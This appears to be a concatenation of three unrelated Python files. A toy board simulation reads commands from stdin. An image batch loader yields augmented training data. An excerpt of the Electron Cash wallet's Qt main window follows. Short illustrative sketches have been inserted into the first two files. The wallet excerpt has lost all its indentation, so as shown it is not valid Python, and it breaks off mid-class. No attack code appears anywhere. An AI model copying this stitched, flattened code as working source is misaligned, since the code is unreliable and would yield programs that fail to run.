server.py
import itertools
import numpy
import threading
import time

import notification
import commander

delay = 1
low_delay = 1 / 24
board = numpy.matrix([[1, 0, 0], [0, 1, 0], [0, 0, 1]])
next_step = lambda x, i, j: x[i, j]  # placeholder rule: every cell keeps its value
isRunning = False


def listener():
    """Read commands from stdin and dispatch them to the commander."""
    while True:
        m = raw_input()  # type: str
        m = m.strip()
        m = m.split(' ')  # type: list[str]
        commander.execute_command(*m)
        time.sleep(0.01)


def calc():
    """Apply next_step to every cell and replace the board with the result."""
    global board
    new_board = numpy.matrix(board)
    for (i, j) in itertools.product(range(board.shape[0]), range(board.shape[1])):
        new_board[i, j] = int(next_step(board, i, j))
    board = new_board


def calculator():
    """Advance and print the board once per `delay` seconds while the simulation runs."""
    global board, next_step
    while True:
        if isRunning:
            calc()
            commander.execute_command('board')
        time.sleep(delay)


listener_thread = threading.Thread(target=listener)
listener_thread.start()
calculator_thread = threading.Thread(target=calculator)
calculator_thread.start()
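
# --- illustrative sketch, not part of the original file ------------------
# The identity lambda above leaves the board unchanged on every tick.  Any
# function with the same (board, i, j) -> new cell value shape can be
# plugged in as next_step; for example, a Conway's Game of Life rule on a
# wrap-around (toroidal) grid could look like this:
def conway_step(x, i, j):
    rows, cols = x.shape
    # count the 8 neighbours, wrapping indices around the board edges
    neighbours = sum(
        x[(i + di) % rows, (j + dj) % cols]
        for di in (-1, 0, 1)
        for dj in (-1, 0, 1)
        if (di, dj) != (0, 0)
    )
    if x[i, j]:
        return 1 if neighbours in (2, 3) else 0
    return 1 if neighbours == 3 else 0
# next_step = conway_step  # swapping the rule in would animate the board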
ImageLoader.py
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 17 22:43:46 2022
"""
import os
from PIL import Image
from PIL import ImageEnhance
import numpy as np
import random
import threading


class ImageLoader:
    '''
    This image loader returns a generator that loads a portion of the images
    from an image directory at a time
    '''
    __img_dir = None
    __img_list = []
    __imageCounter = 0

    def __init__(self, img_dir: str):
        '''
        init image generator
        Parameters
        ----------
        img_dir : str
            image dataset directory
        Returns
        -------
        None.
        '''
        self.__img_dir = img_dir
        # read filenames into a list
        self.__img_list = os.listdir(img_dir)
        # shuffle
        random.seed()
        random.shuffle(self.__img_list)

    def __loadPreloadBatch(self, buffer, batchSize, batchPreloadSize, imageSize):
        '''
        load (batchSize * batchPreloadSize) images into buffer
        Parameters
        ----------
        buffer : numpy.ndarray
            target buffer of shape (batchSize * batchPreloadSize, imageSize, imageSize, 3)
        batchSize : int
            images per batch
        batchPreloadSize : int
            how many batches to preload
        imageSize : int
            output image size
        Returns
        -------
        None.
        '''
        for i in range(batchSize * batchPreloadSize):
            # load img
            PILImage = Image.open(self.__img_dir + '/' + self.__img_list[self.__imageCounter])
            # random crop
            width, height = PILImage.size
            PILImage = PILImage.crop((random.randint(0, 15), random.randint(0, 15),
                                      width - random.randint(0, 15), height - random.randint(0, 15)))
            # random color tweak
            enhance_range = 0.3
            PILImage = ImageEnhance.Brightness(PILImage).enhance(1 + np.random.uniform(0, enhance_range) - (enhance_range / 2))
            PILImage = ImageEnhance.Color(PILImage).enhance(1 + np.random.uniform(0, enhance_range) - (enhance_range / 2))
            PILImage = ImageEnhance.Contrast(PILImage).enhance(1 + np.random.uniform(0, enhance_range) - (enhance_range / 2))
            # convert to a numpy array, normalized to [0, 1]
            img = np.asarray(PILImage.convert('RGB').resize((imageSize, imageSize))) / 255
            buffer[i, :] = img
            self.__imageCounter += 1
            # wrap around after the last image so loading repeats
            self.__imageCounter %= len(self.__img_list)

    def getGenerator(self, batchSize: int, batchPreloadSize=2, batchReuseSize=2, imageSize=256):
        '''
        returns a generator that yields (batchSize) images at a time;
        the generator loads images sequentially and repeats after
        the last image is loaded
        Parameters
        ----------
        batchSize : int
            how many images to yield per step
        batchPreloadSize : int
            how many batches of images to preload into memory
        batchReuseSize : int
            how many times the generator reuses images from preloaded data before loading new data
        imageSize : int
            output image height and width
        Yields
        ------
        (batchSize, imageSize, imageSize, 3) numpy array
        '''
        # batch size check
        if batchSize < 1:
            raise RuntimeError('batch size must be larger than 0')
        # allocate space for images
        X = np.zeros((batchSize, imageSize, imageSize, 3), np.float32)
        # avoid negative numbers
        if batchPreloadSize < 1:
            batchPreloadSize = 1
        if batchReuseSize < 1:
            batchReuseSize = 1
        # double buffer: one half is consumed while the other is being filled
        buffer = [np.zeros((batchSize * batchPreloadSize, imageSize, imageSize, 3), np.float32),
                  np.zeros((batchSize * batchPreloadSize, imageSize, imageSize, 3), np.float32)]
        currentBuffer = 0
        task = None
        # load first buffer
        self.__loadPreloadBatch(buffer[currentBuffer], batchSize, batchPreloadSize, imageSize)
        # never ends, always load more images
        while True:
            # load the next buffer in a different thread
            task = threading.Thread(target=self.__loadPreloadBatch,
                                    args=(buffer[not currentBuffer], batchSize, batchPreloadSize, imageSize))
            task.start()
            # use image data from the current buffer
            for j in range(batchReuseSize):
                for i in range(batchPreloadSize):
                    X[:] = buffer[currentBuffer][i * batchSize: (i + 1) * batchSize]
                    # yield one batch
                    yield X
            # swap buffers
            currentBuffer = not currentBuffer
            # wait until the loading thread finishes its work
            task.join()


def xToXY(gen):
    '''
    This function duplicates the data returned by a generator
    and wraps it into a tuple
    Parameters
    ----------
    gen : generator
        generator that yields a single array
    Returns
    -------
    a generator that yields a tuple (X, X)
    '''
    try:
        while True:
            X = next(gen)
            yield (X, X)
    except StopIteration:
        pass
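
# --- illustrative usage sketch, not part of the original file ------------
# getGenerator() yields float32 batches of shape (batchSize, imageSize,
# imageSize, 3), and xToXY() wraps each batch as an (X, X) pair, the form an
# autoencoder-style training loop expects.  The directory name below is an
# assumption for illustration only.
if __name__ == '__main__':
    loader = ImageLoader('path/to/images')  # hypothetical image directory
    pairs = xToXY(loader.getGenerator(batchSize=4, imageSize=128))
    for _ in range(3):
        X, Y = next(pairs)
        print(X.shape, Y.shape)  # (4, 128, 128, 3) (4, 128, 128, 3)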
main_window.py
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys, time, threading
import os, json, traceback
import shutil
import csv
from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal
import base64
from functools import partial
from collections import OrderedDict
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash import keystore, get_config
from electroncash.address import Address, ScriptOutput
from electroncash.bitcoin import COIN, TYPE_ADDRESS, TYPE_SCRIPT
from electroncash import networks
from electroncash.plugins import run_hook
from electroncash.i18n import _
from electroncash.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, NotEnoughFunds,
ExcessiveFee, UserCancelled, InvalidPassword,
bh2u, bfh, format_fee_satoshis, Weak,
print_error)
import electroncash.web as web
from electroncash import Transaction
from electroncash import util, bitcoin, commands
from electroncash import paymentrequest
from electroncash.wallet import Multisig_Wallet, sweep_preparations
try:
from electroncash.plot import plot_history
except:
plot_history = None
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit, BTCSatsByteEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .popup_widget import ShowPopupLabel, KillPopupLabel, PopupWidget
from .util import *
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(Qt.PointingHandCursor)
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electroncash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
# Note: self.clean_up_connections automatically detects signals named XXX_signal and disconnects them on window close.
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
history_updated_signal = pyqtSignal()
labels_updated_signal = pyqtSignal() # note this signal occurs when an explicit update_labels() call happens. Interested GUIs should also listen for history_updated_signal as well which also indicates labels may have changed.
on_timer_signal = pyqtSignal() # functions wanting to be executed from timer_actions should connect to this signal, preferably via Qt.DirectConnection
status_icon_dict = dict() # app-global cache of "status_*" -> QIcon instances (for update_status() speedup)
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.wallet = wallet
self.config = config = gui_object.config
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.op_return_toolong = False
self.internalpluginsdialog = None
self.externalpluginsdialog = None
self.hardwarewalletdialog = None
self.require_fee_update = False
self.cashaddr_toggled_signal = self.gui_object.cashaddr_toggled_signal # alias for backwards compatibility for plugins -- this signal used to live in each window and has since been refactored to gui-object where it belongs (since it's really an app-global setting)
self.force_use_single_change_addr = None # this is set by the CashShuffle plugin to a single string that will go into the tool-tip explaining why this preference option is disabled (see self.settings_dialog)
self.tl_windows = []
self.tx_external_keypairs = {}
self._tx_dialogs = Weak.Set()
self.tx_update_mgr = TxUpdateMgr(self) # manages network callbacks for 'new_transaction' and 'verified2', and collates GUI updates from said callbacks as a performance optimization
self.is_schnorr_enabled = self.wallet.is_schnorr_enabled # This is a function -- Support for plugins that may be using the 4.0.3 & 4.0.4 API -- this function used to live in this class, before being moved to Abstract_Wallet.
self.send_tab_opreturn_widgets, self.receive_tab_opreturn_widgets = [], [] # defaults to empty list
self.create_status_bar()
self.need_update = threading.Event()
self.labels_need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.converter_tab = self.create_converter_tab()
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
# clears/inits the opreturn widgets
self.on_toggled_opreturn(bool(self.config.get('enable_opreturn')))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.converter_tab, QIcon(":icons/tab_converter.svg"), _("Address Converter"), "converter", True)
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.init_menubar()
wrtabs = Weak(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.gui_object.cashaddr_toggled_signal.connect(self.update_cashaddr_icon)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.gui_object.update_available_signal.connect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
self.history_list.setFocus(True)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['blockchain_updated', 'wallet_updated',
'new_transaction', 'status', 'banner', 'verified2',
'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
_first_shown = True
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted() and self._first_shown:
self._first_shown = False
weakSelf = Weak.ref(self)
#
#try:
# # Amaury's recommendation -- only remind a subset of users to enable it.
# self.remind_cashshuffle_enabled = bool(int.from_bytes(bytes.fromhex(self.wallet.get_public_key(self.wallet.get_addresses()[0])), byteorder='big') & 0x3)
#except (AttributeError, ValueError, TypeError):
# # wallet lacks the get_public_key method
# self.remind_cashshuffle_enabled = False
self.remind_cashshuffle_enabled = False # For now globally disabled
#QTimer.singleShot(300, lambda: weakSelf() and weakSelf().do_cash_shuffle_reminder())
#
# do this immediately after this event handler finishes -- noop on everything but linux
QTimer.singleShot(0, lambda: weakSelf() and weakSelf().gui_object.lin_win_maybe_show_highdpi_caveat_msg(weakSelf()))
def on_history(self, event, *args):
# NB: event should always be 'on_history'
if not args or args[0] is self.wallet:
self.new_fx_history_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_history(self):
if self.cleaned_up: return
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_quotes(self):
if self.cleaned_up: return
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def toggle_tab(self, tab):
show = self.tabs.indexOf(tab) == -1
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_format = _("Hide {tab_description}") if show else _("Show {tab_description}")
item_text = item_format.format(tab_description=tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self), self.wallet.basename())
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
# Issue #662, user got IO error.
# We want them to still get the error displayed to them.
pass
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
#self.print_error("on_network:", event, *args)
if event == 'wallet_updated':
if args[0] is self.wallet:
self.need_update.set()
elif event == 'blockchain_updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_update_mgr.notif_add(args) # added only if this wallet's tx
if args[1] is self.wallet:
self.network_signal.emit(event, args)
elif event == 'verified2':
self.tx_update_mgr.verif_add(args) # added only if this wallet's tx
elif event in ['status', 'banner', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
if self.cleaned_up: return
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'fee':
pass
elif event == 'new_transaction':
self.check_and_reset_receive_address_if_needed()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def _close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error, name = wallet.diagnostic_name() + '/Wallet')
self.update_recently_visited(wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.tray.isVisible():
self.hide()
else:
self.show()
if self._is_invalid_testnet_wallet():
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
self._rebuild_history_action.setEnabled(False)
self._warn_if_invalid_testnet_wallet()
self.watching_only_changed()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
run_hook('load_wallet', wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = '%s %s - %s' % (networks.net.TITLE,
self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin Cash with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoin Cash to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def _is_invalid_testnet_wallet(self):
if not networks.net.TESTNET:
return False
is_old_bad = False
xkey = ((hasattr(self.wallet, 'get_master_public_key') and self.wallet.get_master_public_key())
or None)
if xkey:
from electroncash.bitcoin import deserialize_xpub, InvalidXKeyFormat
try:
xp = deserialize_xpub(xkey)
except InvalidXKeyFormat:
is_old_bad = True
return is_old_bad
def _warn_if_invalid_testnet_wallet(self):
''' This was added after the upgrade from the bad xpub testnet wallets
to the good tpub testnet wallet format in version 3.3.6. See #1164.
We warn users if they are using the bad wallet format and instruct
them on how to upgrade their wallets.'''
is_old_bad = self._is_invalid_testnet_wallet()
if is_old_bad:
msg = ' '.join([
_("This testnet wallet has an invalid master key format."),
_("(Old versions of Electron Cash before 3.3.6 produced invalid testnet wallets)."),
'<br><br>',
_("In order to use this wallet without errors with this version of EC, please <b>re-generate this wallet from seed</b>."),
"<br><br><em><i>~SPV stopped~</i></em>"
])
self.show_critical(msg, title=_('Invalid Master Key'), rich_text=True)
return is_old_bad
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
if filename.lower().endswith('.txn'):
# they did File -> Open on a .txn, just do that.
self.do_process_from_file(fileName=filename)
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent2 = []
for k in recent:
if os.path.exists(k):
recent2.append(k)
recent = recent2[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
gui_object = self.gui_object
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return self.gui_object.get_wallet_folder()
def new_wallet(self):
try:
full_path = self.gui_object.get_new_wallet_path()
except FileNotFoundError as e:
self.show_error(str(e))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = self.menuBar()
menubar.setObjectName(self.diagnostic_name() + ".QMenuBar")
destroyed_print_error(menubar)
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
self._rebuild_history_action = wallet_menu.addAction(_("&Rebuild history"), self.rebuild_history)
self._scan_beyond_gap_action = wallet_menu.addAction(_("&Scan beyond gap..."), self.scan_beyond_gap)
self._scan_beyond_gap_action.setEnabled(bool(self.wallet.is_deterministic() and self.network))
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
#hist_menu.addAction(_("Plot"), self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction(_("Export"), self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_format = _("Hide {tab_description}") if is_shown else _("Show {tab_description}")
item_name = item_format.format(tab_description=tab.tab_description)
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.converter_tab)
add_toggle_action(view_menu, self.console_tab)
tools_menu = menubar.addMenu(_("&Tools"))
# Settings / Preferences are all reserved keywords in OSX using this as work around
tools_menu.addAction(_("Electron Cash preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog)
gui_object = self.gui_object
weakSelf = Weak.ref(self)
tools_menu.addAction(_("&Network"), lambda: gui_object.show_network_dialog(weakSelf()))
tools_menu.addAction(_("Optional &Features"), self.internal_plugins_dialog)
tools_menu.addAction(_("Installed &Plugins"), self.external_plugins_dialog)
if sys.platform in ('linux', 'linux2', 'linux3'):
tools_menu.addSeparator()
tools_menu.addAction(_("&Hardware wallet support..."), self.hardware_wallet_support)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message)
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany)
raw_transaction_menu = tools_menu.addMenu(_("&Load transaction"))
raw_transaction_menu.addAction(_("From &file"), self.do_process_from_file)
raw_transaction_menu.addAction(_("From &text"), self.do_process_from_text)
raw_transaction_menu.addAction(_("From the &blockchain"), self.do_process_from_txid)
raw_transaction_menu.addAction(_("From &QR code"), self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("&Check for updates..."), lambda: self.gui_object.show_update_checker(self))
help_menu.addAction(_("&Official website"), lambda: webopen("https://electroncash.org"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"), lambda: webopen("http://electroncash.readthedocs.io/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug"), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to server"), self.donate_to_server)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
# The message is intentionally untranslated, leave it like that
self.pay_to_URI('{}:{}?message=donation for {}'
.format(networks.net.CASHADDR_PREFIX, d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electron Cash",
_("Version")+" %s" % (self.wallet.electrum_version) + "\n\n" +
_("Electron Cash's focus is speed, with low resource usage and simplifying Bitcoin Cash. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin Cash system." + "\n\n" +
_("Uses icons from the Icons8 icon pack (icons8.com).")))
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=\"https://github.com/Electron-Cash/Electron-Cash/issues\">https://github.com/Electron-Cash/Electron-Cash/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electron Cash (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electron Cash - " + _("Reporting Bugs"), rich_text = True)
def notify(self, message):
self.gui_object.notify(message)
